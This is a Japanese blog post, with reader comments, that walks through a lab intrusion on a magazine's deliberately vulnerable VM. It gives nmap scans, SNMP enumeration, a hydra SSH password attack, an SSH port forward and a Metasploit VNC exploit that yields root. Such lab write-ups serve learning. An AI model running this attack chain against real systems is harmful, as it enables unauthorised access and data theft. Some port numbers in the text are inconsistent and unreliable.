2009年09月24日

ハッカーの侵入方法 実践編

今回は、ハッカージャパン2009年3月号に沿います。

が、記事通りに事が運ばないため、最初に仕込みをしました。


仕込み編は次記事で。


※以下の内容は実験環境です。
 攻撃を自分の管理外のコンピュータに向けることは
 法律で禁止されています。
 


では、簡潔に侵入過程を。


やられ側のコンピュータを、雑誌付属のVMWareイメージ(yarare1)。


攻撃側のコンピュータは、雑誌付属のBackTrack3のLiveCD版。




やられ側、攻撃側を2つ立ち上げます。(上:やられ、下:攻撃)

kidou.PNG


これから攻撃側PCを操作していきます。

Go!

■攻撃側のIPチェック:

bt# ifconfig

結果:192.168.24.58



■やられ側IP検索:

bt# nmap -sP 192.168.24.*

結果:192.168.24.57と判断。



■開きポートチェック:

bt# nmap -sT -p- 192.168.24.57

結果:
199/tcp open smux
5555/tcp open unknown


■ポート199にtelnetでアクセス:

bt# telnet 192.168.24.57 199

結果:AConnection closed by foreign host.ダメ。何もわからん。


■ポート55555にtelnetでアクセス:

bt# telnet 192.168.24.57 5555

結果:SSH-2.0-OpenSSH4.2p1 Debian-7Ubuntu3.5
   ssh2のポートだと分かった。これは使えるかも。


■ポート199にsnmpwalkをpublicで見る:

bt# snmpwalk 192.168.24.57 -v 1 -c public . | less

結果:HJUSER hjuser@hackerjapan.org ユーザ名らしき文字列を発見。


■ポート199にsnmpwalkをprivateで見る:

bt# snmpwalk 192.168.24.57 -v 1 -c private . | less

結果:hjtarget ユーザ名らしき文字列を発見。
   /opt/vnc/Xvncでsuしてるっぽい。


■パスワード解析用のパスワード辞書を取ってくる。

backtrack3付属のブラウザで、Openwall Projectにアクセス。

ftp.openwall.comのリンクからwordlists/passwords/password.gzを取得。

展開する。

bt# gunzip password.gz

結果:解凍して、passwordファイルを取得。


■ssh2にユーザ名hjuserでパスワード解析:

bt# hydra -l hjuser -P password -s 55555 192.168.24.57 ssh2

結果:だめ。ユーザ名か、パスワードがパスワード辞書になかったか。


■ssh2にユーザ名hjtargetでパスワード解析:

bt# hydra -l hjtarget -P password -s 55555 192.168.24.57 ssh2

結果:パスワード判明。front242だった。(※次記事の仕込み編参照)


■ユーザとパスが分かったので、sshでログイン!

bt# ssh hjtarget@192.168.24.57 -p 55555

結果:成功。一般ユーザとして侵入。


■管理権限を得るためvncのバージョンチェック(snmpwalkでvnc確認)

ssh接続から、

target$ /opt/vnc/Xvnc --help

結果:4.1.1。


■MetaSploit FrameworkでVNC4.1用の脆弱性Exploitを探す。

攻撃側PCで以下起動。

[start]>[Backtrack]>[Penetration]>[Framework Version 2]>[Framework2-Msfweb]

ブラウザで、http:localhost:55555にアクセス。

結果:VNC4.1用を発見。クリックしてさらにSelectTargetをクリック。

vnc.PNG

vnc2.PNG


■VNCでアクセスするため5900へポートフォワードする

ssh接続に戻り、

target$ ~C (リターンキーを押してから、チルダC)

ssh> -L 54321:localhost:5900

結果:ポートフォファードでVNCへのポートを繋いだ。


■MetaSploitを設定しExploitボタンクリック

RHOST:localhost
RPORT:5432
1
vnc3.PNG

結果:VNC画面起動

vnc4.PNG

■root権限になる

VNCで右クリックから新しいウインドウを開くとroot。

結果:やられ側PCのroot奪取に成功。



★まとめ

こんな感じで、管理権限を取得しました。

これで、コンピュータ内の情報とりだし放題です。


私感としては、

とても手間隙と知識が・・・


ともあれ、目の見えないところで行われるため、

マジ( ̄□ ̄;)!!で侵入されるんだ!! って

肌感覚で知ってもらえれば、記事にした甲斐があります。



今回使用したBackTrackですが、勝手に外へ仕掛けにいく

曲者のソフトも混じってるようなので、ご注意下さい。


危なくて起動すらままならんどす。



あと、実際に実験したい方は、

ハッカージャパンのページでバックナンバーをどぞ。




posted by ひでまる at 00:00| 京都 ☁| Comment(10) | IT業の日常 | このブログの読者になる | 更新情報をチェックする
この記事へのコメント
こんにちは。
雑誌の内容をここまでわかりやすく解説してくださってすごいなぁと感心して読みました。

ところで、よく「自分以外のサーバーに対するハッキングは警察に捕まる」などの文句が書かれていますが、なぜ警察につかまるのでしょうか?
例えば、仮に管理人様が私のPCに侵入したと致します。
私がそれに気づかなくても警察は侵入に気づけるのでしょうか?
もちろん、私がハッキングに気づき、警察に通報・・・というのなら分からなくもないのですが、まったく侵入された方が分からなければどうなるのでしょう?

以前から抱いていた疑問でしたので、ここで質問させて頂きました。(管理人様なら私のような素人にも分かりやすく説明してくださるのではないかと思いまして・・・)
Posted by 通行人 at 2009年10月08日 19:47
通行人さん、ご丁寧なコメントありがとう。
私が、通行人さんより知識があるかが怪しいですが。

私感としては、届出がなければ分からないと思っています。
まずパケットの特性上、通信は断片化しますし、
それにTELNETやSSHの通信内容がわかっても、第三者からはそれが正規か不正規かの判断は難しい。
ただ、個人もソフトアップデートやファイアウォール、アンチウィルスもどんどん対策を講じてますので、怠らなければそう侵入されることもないと思います。
また、侵入されたらどうなるのか。個人情報狙いか、本命ターゲットへの侵入の踏み台とかが多いと聞いてます。
Posted by 管理人 at 2009年10月09日 02:47
管理人様、丁寧な解説ありがとうございます。
大変参考になりました。

いつも感じていた疑問に答えていただいてこちらこそうれしいです。
ブログの更新頑張ってくださいね。
また見にきますので★★
Posted by 通行人 at 2009年10月09日 19:53
はい、ありがとうございます。
気まぐれな記事にお付き合い頂いて
どうもありがとう♪
Posted by 管理人 at 2009年10月10日 13:22
あの?全然わからないんですけど?
Posted by 0046647 at 2010年01月12日 19:53
まず最初にポートスキャンてしなくちゃいけないですか?
Posted by 0046647 at 2010年01月12日 19:56
辞書?いまさら?あほ?
Posted by 0046647 at 2010年01月12日 19:58
パスワード?は?
何も入力しなきゃいいんじゃないの?永久的に。
Posted by 0046647 at 2010年01月12日 20:00
知り合いはそんなに見られたくなけりゃもうやめなって
いってましたけど?それには同感。
Posted by 0046647 at 2010年01月12日 20:03
あのねー、そんなことに関わっているほど皆ひまじゃないんですよ。厳しいこといいますけど。無視しますよ。
Posted by 0046647 at 2010年01月12日 20:06
コメントを書く
お名前:

メールアドレス:

ホームページアドレス:

コメント:

認証コード: [必須入力]


※画像の中の文字を半角で入力してください。
×

この広告は180日以上新しい記事の投稿がないブログに表示されております。